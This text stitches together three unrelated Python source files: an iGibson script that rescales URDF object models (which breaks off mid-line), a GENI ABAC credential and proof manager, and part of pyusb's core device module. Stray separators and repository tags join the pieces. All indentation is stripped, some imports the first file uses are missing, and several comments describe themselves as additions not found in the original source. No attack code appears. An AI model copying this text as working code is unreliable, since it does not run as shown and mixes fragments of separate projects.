import pybullet as p
import trimesh
from IPython import embed
from PIL import Image
import igibson
from igibson.external.pybullet_tools.utils import get_center_extent, stable_z_on_aabb
from igibson.objects.articulated_object import ArticulatedObject
from igibson.objects.visual_marker import VisualMarker
from igibson.scenes.empty_scene import EmptyScene
from igibson.simulator import Simulator
from igibson.utils.urdf_utils import round_up, save_urdfs_without_floating_joints
from igibson.utils.utils import rotate_vector_3d
SELECTED_CLASSES = ["window"]
SELECTED_INSTANCES = "103070"
def save_scaled_urdf(filename, avg_size_mass, obj_class):
model_path = os.path.dirname(filename)
meta_json = os.path.join(model_path, "misc/metadata.json")
if os.path.isfile(meta_json):
with open(meta_json, "r") as f:
meta_data = json.load(f)
bbox_size = np.array(meta_data["bbox_size"])
base_link_offset = np.array(meta_data["base_link_offset"])
else:
bbox_json = os.path.join(model_path, "misc/bbox.json")
with open(bbox_json, "r") as bbox_file:
bbox_data = json.load(bbox_file)
bbox_max = np.array(bbox_data["max"])
bbox_min = np.array(bbox_data["min"])
bbox_size = bbox_max - bbox_min
base_link_offset = (bbox_min + bbox_max) / 2.0
bounding_box = np.array(avg_size_mass["size"])
scale = bounding_box / bbox_size
# scale = np.array([1.0, 1.0, 1.0])
object_tree = ET.parse(filename)
# We need to scale 1) the meshes, 2) the position of meshes, 3) the position of joints, 4) the orientation axis of joints
# The problem is that those quantities are given wrt. its parent link frame, and this can be rotated wrt. the frame the scale was given in
# Solution: parse the kin tree joint by joint, extract the rotation, rotate the scale, apply rotated scale to 1, 2, 3, 4 in the child link frame
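# For intuition (hedged example, not part of the original comments): a scale of
# (2, 1, 1) given in a parent frame whose child joint frame is rotated 90 degrees
# about z becomes, after rotation and taking absolute values, (1, 2, 1) in the
# child frame -- the stretch follows the axis it was originally applied to.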
# First, define the scale in each link reference frame
# and apply it to the joint values
scales_in_lf = {}
scales_in_lf["base_link"] = scale
all_processed = False
while not all_processed:
all_processed = True
for joint in object_tree.iter("joint"):
parent_link_name = joint.find("parent").attrib["link"]
child_link_name = joint.find("child").attrib["link"]
if parent_link_name in scales_in_lf and child_link_name not in scales_in_lf:
scale_in_parent_lf = scales_in_lf[parent_link_name]
# The location of the joint frame is scaled using the scale in the parent frame
for origin in joint.iter("origin"):
current_origin_xyz = np.array([float(val) for val in origin.attrib["xyz"].split(" ")])
new_origin_xyz = np.multiply(current_origin_xyz, scale_in_parent_lf)
new_origin_xyz = np.array([round_up(val, 4) for val in new_origin_xyz])
origin.attrib["xyz"] = " ".join(map(str, new_origin_xyz))
# scale the prismatic joint
if joint.attrib["type"] == "prismatic":
limits = joint.findall("limit")
assert len(limits) == 1
limit = limits[0]
axes = joint.findall("axis")
assert len(axes) == 1
axis = axes[0]
axis_np = np.array([float(elem) for elem in axis.attrib["xyz"].split()])
major_axis = np.argmax(np.abs(axis_np))
# assume the prismatic joint is roughly axis-aligned
limit.attrib["upper"] = str(float(limit.attrib["upper"]) * scale_in_parent_lf[major_axis])
limit.attrib["lower"] = str(float(limit.attrib["lower"]) * scale_in_parent_lf[major_axis])
# Get the rotation of the joint frame and apply it to the scale
if "rpy" in joint.keys():
joint_frame_rot = np.array([float(val) for val in joint.attrib["rpy"].split(" ")])
# Rotate the scale
scale_in_child_lf = rotate_vector_3d(scale_in_parent_lf, *joint_frame_rot, cck=True)
scale_in_child_lf = np.absolute(scale_in_child_lf)
else:
scale_in_child_lf = scale_in_parent_lf
# print("Adding: ", joint.find("child").attrib["link"])
scales_in_lf[joint.find("child").attrib["link"]] = scale_in_child_lf
# The axis of the joint is defined in the joint frame, we scale it after applying the rotation
for axis in joint.iter("axis"):
current_axis_xyz = np.array([float(val) for val in axis.attrib["xyz"].split(" ")])
new_axis_xyz = np.multiply(current_axis_xyz, scale_in_child_lf)
new_axis_xyz /= np.linalg.norm(new_axis_xyz)
new_axis_xyz = np.array([round_up(val, 4) for val in new_axis_xyz])
axis.attrib["xyz"] = " ".join(map(str, new_axis_xyz))
# Iterate again the for loop since we added new elements to the dictionary
all_processed = False
all_links = object_tree.findall("link")
all_links_trimesh = []
total_volume = 0.0
for link in all_links:
meshes = link.findall("collision/geometry/mesh")
if len(meshes) == 0:
all_links_trimesh.append(None)
continue
assert len(meshes) == 1, (filename, link.attrib["name"])
collision_mesh_path = os.path.join(model_path, meshes[0].attrib["filename"])
trimesh_obj = trimesh.load(file_obj=collision_mesh_path)
all_links_trimesh.append(trimesh_obj)
volume = trimesh_obj.volume
if link.attrib["name"] == "base_link":
if obj_class in ["lamp"]:
volume *= 10.0
total_volume += volume
# Scale the mass based on bounding box size
# TODO: how to scale moment of inertia?
total_mass = avg_size_mass["density"] * bounding_box[0] * bounding_box[1] * bounding_box[2]
print("total_mass", total_mass)
density = total_mass / total_volume
print("avg density", density)
for trimesh_obj in all_links_trimesh:
if trimesh_obj is not None:
trimesh_obj.density = density
assert len(all_links) == len(all_links_trimesh)
# Now iterate over all links and scale the meshes and positions
for link, link_trimesh in zip(all_links, all_links_trimesh):
inertials = link.findall("inertial")
if len(inertials) == 0:
inertial = ET.SubElement(link, "inertial")
else:
assert len(inertials) == 1
inertial = inertials[0]
masses = inertial.findall("mass")
if len(masses) == 0:
mass = ET.SubElement(inertial, "mass")
else:
assert len(masses) == 1
mass = masses[0]
inertias = inertial.findall("inertia")
if len(inertias) == 0:
inertia = ET.SubElement(inertial, "inertia")
else:
assert len(inertias) == 1
inertia = inertias[0]
origins = inertial.findall("origin")
if len(origins) == 0:
origin = ET.SubElement(inertial, "origin")
else:
assert len(origins) == 1
origin = origins[0]
if link_trimesh is not None:
if link.attrib["name"] == "base_link":
if obj_class in ["lamp"]:
link_trimesh.density *= 10.0
if link_trimesh.is_watertight:
center = link_trimesh.center_mass
else:
center = link_trimesh.centroid
# The inertial frame origin will be scaled down below.
# Here, it has the value BEFORE scaling
origin.attrib["xyz"] = " ".join(map(str, center))
origin.attrib["rpy"] = " ".join(map(str, [0.0, 0.0, 0.0]))
mass.attrib["value"] = str(round_up(link_trimesh.mass, 4))
moment_of_inertia = link_trimesh.moment_inertia
inertia.attrib["ixx"] = str(moment_of_inertia[0][0])
inertia.attrib["ixy"] = str(moment_of_inertia[0][1])
inertia.attrib["ixz"] = str(moment_of_inertia[0][2])
inertia.attrib["iyy"] = str(moment_of_inertia[1][1])
inertia.attrib["iyz"] = str(moment_of_inertia[1][2])
inertia.attrib["izz"] = str(moment_of_inertia[2][2])
else:
# empty link that does not have any mesh
origin.attrib["xyz"] = " ".join(map(str, [0.0, 0.0, 0.0]))
origin.attrib["rpy"] = " ".join(map(str, [0.0, 0.0, 0.0]))
mass.attrib["value"] = str(0.0)
inertia.attrib["ixx"] = str(0.0)
inertia.attrib["ixy"] = str(0.0)
inertia.attrib["ixz"] = str(0.0)
inertia.attrib["iyy"] = str(0.0)
inertia.attrib["iyz"] = str(0.0)
inertia.attrib["izz"] = str(0.0)
scale_in_lf = scales_in_lf[link.attrib["name"]]
# Apply the scale to all mesh elements within the link (original scale and origin)
for mesh in link.iter("mesh"):
if "scale" in mesh.attrib:
mesh_scale = np.array([float(val) for val in mesh.attrib["scale"].split(" ")])
new_scale = np.multiply(mesh_scale, scale_in_lf)
new_scale = np.array([round_up(val, 4) for val in new_scale])
mesh.attrib["scale"] = " ".join(map(str, new_scale))
else:
new_scale = np.array([round_up(val, 4) for val in scale_in_lf])
mesh.set("scale", " ".join(map(str, new_scale)))
for origin in link.iter("origin"):
origin_xyz = np.array([float(val) for val in origin.attrib["xyz"].split(" ")])
new_origin_xyz = np.multiply(origin_xyz, scale_in_lf)
new_origin_xyz = np.array([round_up(val, 4) for val in new_origin_xyz])
origin.attrib["xyz"] = " ".join(map(str, new_origin_xyz))
new_filename = filename[:-5] + "_avg_size"
urdfs_no_floating = save_urdfs_without_floating_joints(object_tree, new_filename, False)
# If the object is broken down into multiple URDF files, we only want to
# visualize the main URDF (e.g. visualize the bed and ignore the pillows).
# The main URDF is the one with the highest mass.
max_mass = 0.0
main_urdf_file = None
for key in urdfs_no_floating:
object_tree = ET.parse(urdfs_no_floating[key][0])
cur_mass = 0.0
for mass in object_tree.iter("mass"):
cur_mass += float(mass.attrib["value"])
if cur_mass > max_mass:
max_mass = cur_mass
main_urdf_file = urdfs_no_floating[key][0]
assert main_urdf_file is not None
# Finally, we need to know where the base_link origin is wrt. the bounding box center. That allows us to place the
# model correctly, since the joint transformations given in the scene urdf are for the bounding box center.
# Coordinates of the bounding box center in the base_link frame:
# we scale the location and will subtract it from the joint location.
scaled_bbxc_in_blf = -scale * base_link_offset
return main_urdf_file, scaled_bbxc_in_blf
def get_avg_size_mass():
avg_obj_dims_json = os.path.join(igibson.ig_dataset_path, "objects/avg_category_specs.json")
with open(avg_obj_dims_json) as f:
avg_obj_dims = json.load(f)
return avg_obj_dims
# return {
# 'lamp': {'size': [0.3, 0.4, 0.6], 'mass': 4, 'density': 4 / (0.3 * 0.3 * 1.0)},
# 'chair': {'size': [0.5, 0.5, 0.85], 'mass': 6, 'density': 6 / (0.5 * 0.5 * 0.85)},
# 'bed': {'size': [1.7, 2.2, 0.63], 'mass': 80, 'density': 80 / (1.7 * 2.2 * 0.63)},
# 'cushion': {'size': [0.4, 0.4, 0.25], 'mass': 1.3, 'density': 1.3 / (0.4 * 0.4 * 0.25)},
# 'piano': {'size': [1.16, 0.415, 1.0], 'mass': 225.0, 'density': 225.0 / (0.415 * 1.16 * 1.0)}
# }
def save_scale_urdfs():
main_urdf_file_and_offset = {}
avg_size_mass = get_avg_size_mass()
# all_materials = set()
root_dir = "/cvgl2/u/chengshu/ig_dataset_v5/objects"
for obj_class_dir in os.listdir(root_dir):
obj_class = obj_class_dir
# if obj_class not in SELECTED_CLASSES:
# continue
obj_class_dir = os.path.join(root_dir, obj_class_dir)
for obj_inst_dir in os.listdir(obj_class_dir):
obj_inst_name = obj_inst_dir
if obj_inst_name not in SELECTED_INSTANCES:
continue
urdf_path = obj_inst_name + ".urdf"
obj_inst_dir = os.path.join(obj_class_dir, obj_inst_dir)
urdf_path = os.path.join(obj_inst_dir, urdf_path)
main_urdf_file, scaled_bbxc_in_blf = save_scaled_urdf(urdf_path, avg_size_mass[obj_class], obj_class)
main_urdf_file_and_offset[obj_inst_dir] = (main_urdf_file, scaled_bbxc_in_blf)
print(main_urdf_file)
return main_urdf_file_and_offset
def render_physics_gifs(main_urdf_file_and_offset):
step_per_sec = 100
s = Simulator(mode="headless", image_width=512, image_height=512, physics_timestep=1 / float(step_per_sec))
root_dir = "/cvgl2/u/chengshu/ig_dataset_v5/objects"
obj_count = 0
for i, obj_class_dir in enumerate(sorted(os.listdir(root_dir))):
obj_class = obj_class_dir
# if obj_class not in SELECTED_CLASSES:
# continue
obj_class_dir = os.path.join(root_dir, obj_class_dir)
for obj_inst_dir in os.listdir(obj_class_dir):
# if obj_inst_dir != '14402':
# continue
imgs = []
scene = EmptyScene()
s.import_scene(scene, render_floor_plane=True)
obj_inst_name = | |
<reponame>hussamnasir/geni-ch
# ----------------------------------------------------------------------
# Copyright (c) 2013-2016 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
# ----------------------------------------------------------------------
# Class to manage a set of ABAC credentials and certificates, and to prove queries against them
from ConfigParser import ConfigParser
import datetime
import optparse
import os
import subprocess
import sys
import tempfile
from chapi_log import *
from credential_tools import generate_credential
import xml.dom.minidom as minidom
from ABACKeyId import compute_keyid_from_cert_file, compute_keyid_from_cert
# Generate an ABACManager config file
# [Principals]
# name=certfile
# ...
# [Keys]
# name=keyfile
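#
# For example, the generated file might look like this (hedged illustration;
# the principal names and temp-file paths below are placeholders):
#   [Principals]
#   ME=/tmp/tmpa1b2c3
#   alice=/tmp/tmpd4e5f6
#   [Keys]
#   ME=/tmp/me_key.pem
#   [AssertionFiles]
#   /tmp/tmpg7h8i9=None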
#
# Return name of config file and any tempfiles created in this process
def create_abac_manager_config_file(id_cert_files, id_certs, id_key_files, \
raw_assertions):
tempfiles = []
# Format
# [Principals]
# The principals ("ME" and any in ID dictionary)
# [Keys]
# The keys ("ME")
# [AssertionFiles]
(fd, config_filename) = tempfile.mkstemp()
tempfiles.append(config_filename)
os.close(fd)
file = open(config_filename, 'w')
file.write('[Principals]\n')
for id_name, id_cert_file in id_cert_files.items():
file.write('%s=%s\n' % (id_name, id_cert_file))
for id_name, id_cert in id_certs.items():
(id_fd, id_filename) = tempfile.mkstemp()
tempfiles.append(id_filename)
os.close(id_fd)
id_file = open(id_filename, 'w')
id_file.write(id_cert)
id_file.close()
file.write('%s=%s\n' % (id_name, id_filename))
file.write('[Keys]\n')
for id_key_name, id_key_file in id_key_files.items():
file.write('%s=%s\n' % (id_key_name, id_key_file))
file.write('[AssertionFiles]\n')
for raw_assertion in raw_assertions:
(raw_fd, raw_filename) = tempfile.mkstemp()
tempfiles.append(raw_filename)
os.close(raw_fd)
raw_file = open(raw_filename, 'w')
raw_file.write(raw_assertion)
raw_file.close()
file.write('%s=None\n' % raw_filename)
file.close()
return config_filename, tempfiles
# Run a subprocess and grab and return contents of standard output
def grab_output_from_subprocess(args, include_stderr=False):
if include_stderr:
proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
result = ''
chunk = proc.stdout.read()
while chunk:
result = result + chunk
chunk = proc.stdout.read()
return result
# Evaluate a query for given ID definitions and raw XML assertions
def execute_abac_query(query_expr, id_certs, raw_assertions = []):
abac_manager = ABACManager(certs_by_name=id_certs, raw_assertions=raw_assertions)
return abac_manager.query(query_expr)
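# Hedged usage sketch (the principal names and variables below are placeholders):
#
#   ok, proof = execute_abac_query("ORG.member<-alice",
#                                  {"ORG": org_cert_pem, "alice": alice_cert_pem},
#                                  [signed_assertion_xml])
#
# 'ok' is True/False and 'proof' is the chain of RT0 links found by query().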
# Get the key_id from a raw cert
def get_keyid_from_cert(cert, cert_file):
return compute_keyid_from_cert(cert, cert_file)
# Get the key_id from a cert_file
def get_keyid_from_certfile(cert_file):
return compute_keyid_from_cert_file(cert_file)
ABAC_TEMPLATE = "/usr/share/geni-chapi/abac_credential.xml"
# Generate an ABAC credential of a given assertion signed by "ME"
# with a set of id_certs (a dictionary of {name : cert}
def generate_abac_credential(assertion, me_cert, me_key,
id_certs = {}, id_cert_files = {}):
template = open(ABAC_TEMPLATE).read()
abac_manager = ABACManager(certs_by_name=id_certs, cert_files_by_name=id_cert_files)
assertion_split = assertion.split('<-')
subject_split = assertion_split[0].split('.')
subject_name = subject_split[0]
subject_role = subject_split[1]
subject_keyid = abac_manager._ids_by_name[subject_name]
target_split = assertion_split[1].split('.')
target_name = target_split[0]
target_keyid = abac_manager._ids_by_name[target_name]
target_role = ''
if len(target_split) > 1:
target_role = "<role>%s</role>" % target_split[1]
expires = datetime.datetime.utcnow() + datetime.timedelta(0, ABACManager.ten_years)
abac_mapping = {
'@expires@' : expires.isoformat(),
'@subject_keyid@' : subject_keyid,
'@subject_role@' : subject_role,
'@target_keyid@' : target_keyid,
'@target_role@' : target_role
}
signer_keyid = get_keyid_from_certfile(me_cert)
if (signer_keyid != subject_keyid):
print "Cannot create an ABAC credential where the subject is not the signer"
sys.exit(0)
return generate_credential(template, abac_mapping, me_cert, me_key)
# Assertions are a list of RT0 statements
# X.Y<-Z
# X.Y<-Z.W
# or RT1_lite statements (translated into RT0)
# X.Y(S)<-Z(T)
# X.Y(S)<-Z.W(T)
class ABACManager:
# Constants
ten_years = 10*365*24*3600
# Constructor
# Optional arguments:
# certs_by_name : A dictionary of principal_name => cert
# cert_files_by_name : A dictionary of principal_name => cert_filename
# key_files_by_name: A dictionary of principal_name => private_key_filename
# assertions : A list of assertions as ABAC statements (X.Y<-Z e.g.)
# raw_assertions : A list of signed XML versions of ABAC statements
# assertion_files : A list of files containing signed XML versions of ABAC statements
# options : List of command-line provided optional values
def __init__(self, certs_by_name={}, cert_files_by_name={}, \
key_files_by_name={}, \
assertions=[], raw_assertions=[], assertion_files=[], \
options=None):
# For verbose debug output
self._verbose = False
# List of all ABAC principals (IDs) by name
self._ids_by_name = {}
# List of all files created from dumping certs or raw assertions
self._created_filenames = []
# All certs provided as raw cert objects
self._certs = []
# All cert files indexed by principal name
self._cert_files = {}
# All key files indexed by principal name
self._key_files = {}
# All raw assertions (as ABAC expressions)
self._assertions = []
# All assertion files
self._assertion_files = []
# Support internal prover
# Maintain all assertions and links
self._all_assertions = []
self._all_links = {} # ABAC links : where can I get to from X (All Y st. Y<-X)
# Process all the cert files
for principal_name in cert_files_by_name.keys():
cert_file = cert_files_by_name[principal_name]
principal = self.register_id(principal_name, cert_file)
# Process all the raw certs
for principal_name in certs_by_name.keys():
cert = certs_by_name[principal_name]
cert_file = self._dump_to_file(cert)
principal = self.register_id_for_cert(principal_name, cert, cert_file)
# Process the private keys
for principal_name in key_files_by_name.keys():
key_file = key_files_by_name[principal_name]
self.register_key(principal_name, key_file)
# Process all assertions
for assertion in assertions:
self.register_assertion(assertion)
# Process all raw_assertions
for raw_assertion in raw_assertions:
raw_assertion_file = self._dump_to_file(raw_assertion)
# print "Loading raw assertion file " + raw_assertion_file
self.register_assertion_file(raw_assertion_file)
# Process all assertion files
for assertion_file in assertion_files:
self.register_assertion_file(assertion_file)
# Save command-line options
self._options = options
# And process if provided
if self._options:
self.init_from_options()
def init_from_options(self):
# If a config file is provided, read it into the ABACManager
if self._options.config:
cp = ConfigParser()
cp.optionxform=str
cp.read(self._options.config)
for name in cp.options('Principals'):
cert_file = cp.get('Principals', name)
self.register_id(name, cert_file)
for name in cp.options('Keys'):
key_file = cp.get('Keys', name)
self.register_key(name, key_file)
if 'Assertions' in cp.sections():
for assertion in cp.options('Assertions'):
self.register_assertion(assertion)
if 'AssertionFiles' in cp.sections():
for assertion_file in cp.options("AssertionFiles"):
self.register_assertion_file(assertion_file)
# Use all the other command-line options to override/augment
# the values in the ABACManager
# Add new principal ID's / keys
if self._options.id:
for id_filename in self._options.id:
parts = id_filename.split(':')
id_name = parts[0].strip()
id_cert_file = None
if len(parts) > 1:
id_cert_file = parts[1].strip()
self.register_id(id_name, id_cert_file)
id_key_file = None
if len(parts) > 2:
id_key_file = parts[2].strip()
self.register_key(id_name, id_key_file)
# Register assertion files provided by command line
if self._options.assertion_file:
for assertion_file in self._options.assertion_file:
self.register_assertion_file(assertion_file)
# Grab pure ABAC assertions from commandline
if self._options.assertion:
for assertion in self._options.assertion:
self.register_assertion(assertion)
# Run command-line request for manager,
# either querying or creating/writing an assertion credential
def run(self):
if self._options.query:
ok, proof = self.query(self._options.query)
if ok:
print "Succeeded"
print "\n".join(self.pretty_print_proof(proof))
else:
print "Failed"
else:
if not self._options.credential \
or not self._options.signer_cert \
or not self._options.signer_key:
print "Missing signer_cert or signer_key argument for creating credential"
else:
cred = generate_abac_credential(self._options.credential,
self._options.signer_cert,
self._options.signer_key,
id_cert_files = self._cert_files)
if self._options.outfile:
f = open(self._options.outfile, 'w')
f.write(cred)
f.close()
else:
print cred
# Traverse the tree of ABAC expressions to find a path leading from 'from_expr' to 'to_expr'
def find_path(self, from_expr, to_expr):
if from_expr not in self._all_links:
return False, None
if to_expr in self._all_links[from_expr]:
direct_link = "%s<-%s" % (to_expr, from_expr)
return True, [direct_link]
for link in self._all_links[from_expr]:
found_sub_path, sub_proof = self.find_path(link, to_expr)
if found_sub_path:
direct_link = "%s<-%s" % (link, from_expr)
return True, [direct_link] + sub_proof
return False, None
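# Hedged walk-through (not in the original source): if the loaded assertions
# amount to links {"alice": {"PI.student"}, "PI.student": {"ORG.member"}}, then
# find_path("alice", "ORG.member") follows alice -> PI.student -> ORG.member and
# returns (True, ["PI.student<-alice", "ORG.member<-PI.student"]).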
# Does given target have given role?
# I.e. can we prove query statement Q (X.role<-target)
# Return ok, proof
def query(self, query_expression):
# You gotta parse the expressions and go head-to-tail...
parts = query_expression.split('<-')
lhs = parts[0]
# If we have a parameterized query e.g. A.B(C)<-D, replace with A.B_C<-D
if '(' in lhs and ')' in lhs:
lhs = lhs.replace('(', '_')
lhs = lhs.replace(')', '')
rhs = parts[1]
response, proof = self.find_path(rhs, lhs)
return response, proof
# Delete all the tempfiles created
def __del__(self):
for created_filename in self._created_filenames:
os.remove(created_filename)
# Register a new ID with the manager
def register_id(self, name, cert_file):
id = get_keyid_from_certfile(cert_file)
self._ids_by_name[name] = id
self._cert_files[name] = cert_file
# Register a new ID with the manager for a raw_cert and cert_file
| |
<gh_stars>1-10
# Copyright (C) 2009-2014 <NAME>
#
# The following terms apply to all files associated
# with the software unless explicitly disclaimed in individual files.
#
# The authors hereby grant permission to use, copy, modify, distribute,
# and license this software and its documentation for any purpose, provided
# that existing copyright notices are retained in all copies and that this
# notice is included verbatim in any distributions. No written agreement,
# license, or royalty fee is required for any of the authorized uses.
# Modifications to this software may be copyrighted by their authors
# and need not follow the licensing terms described here, provided that
# the new terms are clearly indicated on the first page of each file where
# they apply.
#
# IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
# FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
# ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
# DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
# IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
# NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
# MODIFICATIONS.
r"""usb.core - Core USB features.
This module exports:
Device - a class representing a USB device.
Configuration - a class representing a configuration descriptor.
Interface - a class representing an interface descriptor.
Endpoint - a class representing an endpoint descriptor.
find() - a function to find USB devices.
show_devices() - a function to show the devices present.
"""
__author__ = '<NAME>'
__all__ = [ 'Device', 'Configuration', 'Interface', 'Endpoint', 'find',
'show_devices' ]
import usb.util as util
import copy
import operator
import usb._interop as _interop
import usb._objfinalizer as _objfinalizer
import usb._lookup as _lu
import logging
import array
import threading
import functools
_logger = logging.getLogger('usb.core')
_DEFAULT_TIMEOUT = 1000
def _set_attr(input, output, fields):
for f in fields:
setattr(output, f, getattr(input, f))
def _try_get_string(dev, index, langid = None, default_str_i0 = "",
default_access_error = "Error Accessing String"):
""" try to get a string, but return a string no matter what
"""
if index == 0 :
string = default_str_i0
else:
try:
if langid is None:
string = util.get_string(dev, index)
else:
string = util.get_string(dev, index, langid)
except :
string = default_access_error
return string
def _try_lookup(table, value, default = ""):
""" try to get a string from the lookup table, return "" instead of key
error
"""
try:
string = table[ value ]
except KeyError:
string = default
return string
class _DescriptorInfo(str):
""" this class is used so that when a descriptor is shown on the
terminal it is propely formatted """
def __repr__(self):
return self
def synchronized(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
try:
self.lock.acquire()
return f(self, *args, **kwargs)
finally:
self.lock.release()
return wrapper
class _ResourceManager(object):
def __init__(self, dev, backend):
self.backend = backend
self._active_cfg_index = None
self.dev = dev
self.handle = None
self._claimed_intf = _interop._set()
self._ep_info = {}
self.lock = threading.RLock()
@synchronized
def managed_open(self):
if self.handle is None:
self.handle = self.backend.open_device(self.dev)
return self.handle
@synchronized
def managed_close(self):
if self.handle is not None:
self.backend.close_device(self.handle)
self.handle = None
@synchronized
def managed_set_configuration(self, device, config):
if config is None:
cfg = device[0]
elif isinstance(config, Configuration):
cfg = config
elif config == 0: # unconfigured state
class MockConfiguration(object):
def __init__(self):
self.index = None
self.bConfigurationValue = 0
cfg = MockConfiguration()
else:
cfg = util.find_descriptor(device, bConfigurationValue=config)
if cfg is None:
raise ValueError("Invalid configuration " + str(config))
self.managed_open()
self.backend.set_configuration(self.handle, cfg.bConfigurationValue)
# cache the index instead of the object to avoid cyclic references
# of the device and Configuration (Device tracks the _ResourceManager,
# which tracks the Configuration, which tracks the Device)
self._active_cfg_index = cfg.index
self._ep_info.clear()
@synchronized
def managed_claim_interface(self, device, intf):
self.managed_open()
if isinstance(intf, Interface):
i = intf.bInterfaceNumber
else:
i = intf
if i not in self._claimed_intf:
self.backend.claim_interface(self.handle, i)
self._claimed_intf.add(i)
@synchronized
def managed_release_interface(self, device, intf):
if intf is None:
cfg = self.get_active_configuration(device)
i = cfg[(0,0)].bInterfaceNumber
elif isinstance(intf, Interface):
i = intf.bInterfaceNumber
else:
i = intf
if i in self._claimed_intf:
try:
self.backend.release_interface(self.handle, i)
finally:
self._claimed_intf.remove(i)
@synchronized
def managed_set_interface(self, device, intf, alt):
if isinstance(intf, Interface):
i = intf
else:
cfg = self.get_active_configuration(device)
if intf is None:
intf = cfg[(0,0)].bInterfaceNumber
if alt is not None:
i = util.find_descriptor(cfg, bInterfaceNumber=intf, bAlternateSetting=alt)
else:
i = util.find_descriptor(cfg, bInterfaceNumber=intf)
self.managed_claim_interface(device, i)
if alt is None:
alt = i.bAlternateSetting
self.backend.set_interface_altsetting(self.handle, i.bInterfaceNumber, alt)
@synchronized
def setup_request(self, device, endpoint):
# we need the endpoint address, but the "endpoint" parameter
# can be either an Endpoint object or the endpoint address itself
if isinstance(endpoint, Endpoint):
endpoint_address = endpoint.bEndpointAddress
else:
endpoint_address = endpoint
intf, ep = self.get_interface_and_endpoint(device, endpoint_address)
self.managed_claim_interface(device, intf)
return (intf, ep)
# Find the interface and endpoint objects which endpoint address belongs to
@synchronized
def get_interface_and_endpoint(self, device, endpoint_address):
try:
return self._ep_info[endpoint_address]
except KeyError:
for intf in self.get_active_configuration(device):
ep = util.find_descriptor(intf, bEndpointAddress=endpoint_address)
if ep is not None:
self._ep_info[endpoint_address] = (intf, ep)
return intf, ep
raise ValueError('Invalid endpoint address ' + hex(endpoint_address))
@synchronized
def get_active_configuration(self, device):
if self._active_cfg_index is None:
self.managed_open()
cfg = util.find_descriptor(
device,
bConfigurationValue=self.backend.get_configuration(self.handle)
)
if cfg is None:
raise USBError('Configuration not set')
self._active_cfg_index = cfg.index
return cfg
return device[self._active_cfg_index]
@synchronized
def release_all_interfaces(self, device):
claimed = copy.copy(self._claimed_intf)
for i in claimed:
try:
self.managed_release_interface(device, i)
except USBError:
# Ignore errors when releasing the interfaces
# When the device is disconnected, the call may fail
pass
@synchronized
def dispose(self, device, close_handle = True):
self.release_all_interfaces(device)
if close_handle:
self.managed_close()
self._ep_info.clear()
self._active_cfg_index = None
class USBError(IOError):
r"""Exception class for USB errors.
Backends must raise this exception when USB related errors occur. The
backend specific error code is available through the 'backend_error_code'
member variable.
"""
def __init__(self, strerror, error_code = None, errno = None):
r"""Initialize the object.
This initializes the USBError object. The strerror and errno are passed
to the parent object. The error_code parameter is attributed to the
backend_error_code member variable.
"""
IOError.__init__(self, errno, strerror)
self.backend_error_code = error_code
class NoBackendError(ValueError):
r"Exception class when a valid backend is not found."
pass
class Endpoint(object):
r"""Represent an endpoint object.
This class contains all fields of the Endpoint Descriptor according to the
USB Specification. You can access them as class properties. For example, to
access the field bEndpointAddress of the endpoint descriptor, you can do so:
>>> import usb.core
>>> dev = usb.core.find()
>>> for cfg in dev:
>>> for i in cfg:
>>> for e in i:
>>> print e.bEndpointAddress
"""
def __init__(self, device, endpoint, interface = 0,
alternate_setting = 0, configuration = 0):
r"""Initialize the Endpoint object.
The device parameter is the device object returned by the find()
function. endpoint is the endpoint logical index (not the endpoint
address). The configuration parameter is the logical index of the
configuration (not the bConfigurationValue field). The interface
parameter is the interface logical index (not the bInterfaceNumber
field) and alternate_setting is the alternate setting logical index
(not the bAlternateSetting value). An interface may have only one
alternate setting. In this case, the alternate_setting parameter
should be zero. By "logical index" we mean the relative order of the
configurations returned by the peripheral as a result of GET_DESCRIPTOR
request.
"""
self.device = device
self.index = endpoint
backend = device._ctx.backend
desc = backend.get_endpoint_descriptor(
device._ctx.dev,
endpoint,
interface,
alternate_setting,
configuration
)
_set_attr(
desc,
self,
(
'bLength',
'bDescriptorType',
'bEndpointAddress',
'bmAttributes',
'wMaxPacketSize',
'bInterval',
'bRefresh',
'bSynchAddress',
'extra_descriptors'
)
)
def __repr__(self):
return "<" + self._str() + ">"
def __str__(self):
headstr = " " + self._str() + " "
if util.endpoint_direction(self.bEndpointAddress) == util.ENDPOINT_IN:
direction = "IN"
else:
direction = "OUT"
return "%s%s\n" % (headstr, "=" * (60 - len(headstr))) + \
" %-17s:%#7x (7 bytes)\n" % (
"bLength", self.bLength) + \
" %-17s:%#7x %s\n" % (
"bDescriptorType", self.bDescriptorType,
